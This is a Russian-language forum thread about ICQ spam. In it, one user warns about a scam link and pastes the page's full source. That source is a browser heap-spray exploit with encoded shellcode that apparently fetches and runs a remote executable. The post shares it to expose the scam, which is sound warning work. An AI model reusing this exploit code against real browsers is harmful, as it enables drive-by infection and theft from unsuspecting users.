• XSS.stack #1 – первый литературный журнал от юзеров форума

Приходит ли вам спам по асям?

Приходит ли вам спам по асям?

Результаты
Отслеживать
На 9-ку шёл... На одной шохе всё норм, а на другой... просто ппц. Я её по примаку угнал, видать чёвак был злостный спаммер. Так вот кто-то ему мстит. всё мыло и асю засрали :shit:
 
хм когда на 9 сидел шел постоянно вот пересел на семеру и ни одного спам сообшения... незнаю даже почему....
 
Спам приходил 3 раза...
Один раз пришел опасный спам...(логи не сохранились)
Стучит чел - говорит вот такая то страница раскручивается...Нужны активные люди,модераторы и т.д.
А за каждый вход вам будет зачислятся 0.2 wmz на ваш кошелек.И что вы должны туда зайти обязательно с браузера IE и разрешить ActivX.Я думал это спам бот.
ну пишу ему шел бы ты на ....Как не странно из аси получил ответ - а че так?
Ну думаю дайка зайду на страницу...Тока слава богу не с IE :) зашел со Oper'ы :) хмм...Страница абсолютно пустая. :lol2: беру я просматриваю код страницы.
Там было следующее :
Код: 
<html><script id="TheCorpse" language="javascript">

sMSHTML_heap_spray = unescape("%u0D0D%u0D0D"); 
for (i=0; i<7; i++)
sMSHTML_heap_spray += sMSHTML_heap_spray;
try {exploit(opener.document.createComment(sMSHTML_heap_spray));}
catch(e) {window.open(document.location.href);}
function exploit(parent_element) { opener.focus();
window.moveTo(100000, 100000);
iHeap_fill_to_address = 0x12000000;
sHeap_return_address = unescape("%u0D0D%u0D0D"); 
sShellcode = unescape("%u4343%u4343%uEB43%u5643%u8B57%u3C45%u548B%u7828%uD503%u8B52%u2052%uD503%uC033%uC933%u8B41%u8A34%uF503%uFF33%uCFC1%uAC13%uF803%uC085%uF675%uFB3B%uEA75%u8B5A%u245A%uDD03%u8B66%u4B0C%u5A8B%u031C%u8BDD%u8B04%uC503%u5E5F%uE0FF%u8C66%uA8D8%u7404%u333C%u64C0%u00A1%u0000%u8100%u0478%u0000%u7000%u0473%u008B%uF3EB%u408B%u6604%uC02B%u8166%u4D38%u745A%u2D07%u0000%u0001%uF2EB%u508B%u663C%u3C81%u5002%u0F45%uA985%u0000%u8B00%uEBE8%u3311%uFCC0%u8B64%u3040%u408B%u8B0C%u1C70%u8BAD%u0868%uC481%uFE50%uFFFF%uF48B%u6856%u0096%u0000%u79BB%uE741%uE888%uFF51%uFFFF%uD68B%uC033%u0BAC%u75C0%uC7FB%uFF46%u3630%u3636%u46C7%u2E03%u7865%uC665%u0746%u8B00%u33F2%u66C0%u6CB8%u506C%u6F68%u2E6E%u6864%u7275%u6D6C%uBB54%uA771%uFEE8%u18E8%uFFFF%u8BFF%u8BFD%uE8E8%u0000%u0000%u815A%uF8EA%u4010%u6A00%u6A00%u5600%u928D%u1135%u0040%u6A52%uBB00%uC07D%u8318%uF0E8%uFFFE%u6AFF%u5601%uEF8B%uE0BB%u76DC%uE850%uFEE1%uFFFF%u006A%u69BB%u421D%uE83A%uFED5%uFFFF%u08C2%u6800%u7474%u3A70%u2F2F%u7777%u2E77%u7561%u6F74%u7865%u7274%u6D65%u2E65%u7572%u632F%u7273%u7373%u652E%u6578%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6A00%uE800%u039A%u0000%u76A3%u4048%u6A00%u6800%u1239%u0040%u006A%uAE68%u403F%u5000%u2DE8%u0003%uC300%u6F43");
 iHeap_header_size = 0x254;
 iHeap_block_size = 0x400000;
 iShellcode_size = sShellcode.length * 2;
 iNopslide_size = iHeap_block_size - (iHeap_header_size + iShellcode_size);
 sNopslide = sHeap_return_address;
 while (sNopslide.length*2<iNopslide_size) sNopslide+=sNopslide;
 sNopslide = sNopslide.substring(0, iNopslide_size/2);
 iHeap_block_count = (iHeap_fill_to_address-0x400000) / iHeap_block_size;
 memory = new Array();
 for (i=0;i<iHeap_block_count;i++) memory[i] = sNopslide + sShellcode;
 sMSHTML_heap_spray = sNopslide.substring(0, 0x100);
 for(i=0;i<1024;i++) try {
 parent_element.appendChild(document.createComment(sMSHTML_heap_spray));
 } catch (e) { }
 }
 </SCRIPT></HTML>
вот так.Слава богу что не с IE зашел :) и еще б ActivX разрешил :).
Вобщем думайте сами!Это развод такой!
А так спам был раза 3...Предлагали увеличить член и т.д.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх